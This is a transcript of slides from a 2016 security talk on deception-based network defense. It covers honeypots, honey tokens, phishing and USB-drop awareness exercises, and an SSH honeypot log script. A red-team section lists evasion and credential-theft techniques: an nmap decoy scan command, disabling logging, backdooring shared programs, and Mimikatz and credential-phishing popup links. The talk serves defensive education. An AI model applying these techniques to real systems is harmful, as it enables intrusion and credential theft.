Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Deception Driven Defense - Infragard 2016

665 views

Published on

Using deceptive tactics to actively defend your network. This is a modified version of the talk that Thomas Hegel and I gave at DerbyCon 5.

Published in: Technology
  • Be the first to comment

Deception Driven Defense - Infragard 2016

  1. 1. Deception Driven Defense
  2. 2. Greg Foss Head of Security Operations OSCP, GAWN, GPEN, GWAPT, GCIH, CEH, CYBER APT # whoami
  3. 3. Diversion & Deception in Warfare Draw Attention Away From True Attack Point Mislead With False Appearance Gain Advantage Over Enemy “All war is based on deception” -Sun Tzu
  4. 4. Operation Mincemeat - 1943 Operation Zeppelin - 1944 Battle of Megiddo - 1918 Operation Bodyguard - 1942 Operation Anadyr - 1962 ..and many more Diversion & Deception in Warfare
  5. 5. Operation Mincemeat - 1943 Germans find British corpse from sunken enemy warship 1.
  6. 6. Operation Mincemeat - 1943 Corpse holds Plans to upcoming attack in Greece 2.
  7. 7. Operation Mincemeat - 1943 Germans move defenses from Sicily to Greece 3.
  8. 8. Operation Mincemeat - 1943 Allied Nations invade Sicily 4.
  9. 9. 9
  10. 10. Apply this to InfoSec?
  11. 11. In Practice Network Data Human Defense
  12. 12. First things first… Baseline security controls! Warning banners are critical and assist in the event prosecution is necessary / desired.
  13. 13. Honeypots Easy to configure, deploy, and maintain Fly traps for anomalous activity You will learn a ton about your adversaries. Information that will help in the future…
  14. 14. Subtle Traps Catch Internal Attackers Observe Attack Trends Decoy From Real Data Waste Attackers Time Honeypot Use Cases
  15. 15. Fake Web Applications github.com/gfoss/phpmyadmin_honeypot
  16. 16. $any-web-app Custom + Believable, with a Hidden Motive
  17. 17. Passive Honeypots 19 https://chloe.re/2015/06/20/a-month-with-badonions/
  18. 18. Passive Honeypots 20 https://chloe.re/2015/06/20/a-month-with-badonions/
  19. 19. Passive Honeypots 21 https://chloe.re/2015/06/20/a-month-with-badonions/
  20. 20. Honey Tokens and Web Bugs
  21. 21. Issues with Document Tracking
  22. 22. Issues with Document Tracking
  23. 23. Issues with Document Tracking
  24. 24. Zip Bombs AdobeFlash.zip 42 bytes 4.5 petabytes www.unforgettable.dk
  25. 25. Keys to Success Real World Awareness Training Use a Blended Approach to Exercises Gather Metrics for Program Improvements Note: Never Punish or Embarrass Users!
  26. 26. Scope Social Habits Public Information Username Correlation Application Usage “Private” Information Examine Network Usage
  27. 27. “Free” Coupons! QR Destination as training or phishing site Print > Place on Cars in Lot Rate of Connections Rate Reported to Security Track via internal IP address
  28. 28. Targeted Spear Phishing Open Attachment Rate Open Message Rate Martin Bos & Eric Milam SkyDogCon 2012 - Advanced Phishing Tactics Beyond User Awareness Defense Success / Failures Response / Exploitation Rate
  29. 29. Rogue Wi-Fi Setup Wi-Fi Access Provide Fake Landing Page Get Credentials! Connection Rate Credential Submission Rate Report to Security Rate www.slideshare.net/heinzarelli/wifi-hotspot-attacks https://youtu.be/v36gYY2Pt70
  30. 30. USB Drop Case Study
  31. 31. Building a Believable Campaign USB Human Interface Device (HID) attacks are too obvious. A dead giveaway that the target just compromised their system. h"p://hakshop.myshopify.com/products/usb-rubber-ducky-deluxe?variant=353378649
  32. 32. Building a Believable Campaign Use Realistic Files with somewhat realistic data Staged approach to track file access and exploitation
  33. 33. Webbug file opened from within your company network? Correlate using Network Security Tools to find out who it was Tracking File Access
  34. 34. Who Opened the File?
  35. 35. Compress the PowerShell Script
  36. 36. You may want to use a bogus email address, unlike I did here… I know, I know, Bad OpSec… Send email when macro is run
  37. 37. “Nobody’s going to run an executable from some random USB” - Greg
  38. 38. At least they didn’t run it as an Admin But… We now have our foothold…
  39. 39. Macro Attack Detection
  40. 40. Malware Beaconing Detection
  41. 41. Red Teaming Not Penetration Testing! No Scope Restrictions
  42. 42. Offensive Honeypots All of these tools have something in common… ● Configuration Management Systems ● Vulnerability Scanners ● System Health Checks They tend to log in to remote hosts!
  43. 43. Simulate SSH service Stand this up during internal penetration test Catch Credentials...
  44. 44. #!/bin/bash attempts=$(cat /opt/kippo/log/kippo.log | grep 'login attempt' | wc -l); echo "" echo $attempts" => login attempts" echo "--------------------" cat /opt/kippo/log/kippo.log | grep 'login attempt' | cut -d "," -f 3,4,5 | awk '{print "["$1" "$4}' echo "--------------------" echo ""
  45. 45. Social Engineering
  46. 46. Social Engineering WYSINWYC http://thejh.net/misc/website-terminal-copy-paste
  47. 47. DEMO
  48. 48. Post-Exploitation Tricks Use Deception to: Elevate Privileges Access Protected Resources Pivot and Move Laterally Etc.
  49. 49. OS X - AppleScript fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
  50. 50. DEMO
  51. 51. Windows - PowerShell github.com/gfoss/misc/blob/master/PowerShell/popuppwn.ps1
  52. 52. DEMO
  53. 53. Attack Security Tools ● Generate False and/or Malformed Logs ● Spoof Port Scanning Origins $ sudo nmap -sS -P0 -D sucker target(s) ● Block UDP Port 514 or disable logging service ● Capture Service Account Credentials ● Wear AV like a hat and backdoor 
 legitimate programs on the shares…
  54. 54. https://www.shellterproject.com/
  55. 55. Target IT Staff… It’s broken. :-( I don’t know what happened… Can you fix it? github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz
  56. 56. In Conclusion Network Data Human Defense
  57. 57. Recommended Resources Red Team: How to Succeed By Thinking Like the Enemy Micah Zenko Offensive Countermeasures: The Art of Active Defense Paul Asadoorian and John Strand Reverse Deception: Organized Cyber Threat Counter- exploitation. Sean Bodmer Second World War Deception: Lessons Learned from Today’s Joint Planner Major Donald J. Bacon, USAF
  58. 58. Thank You! Questions? Greg Foss
 greg.foss [at] LogRhythm.com
 @heinzarelli

×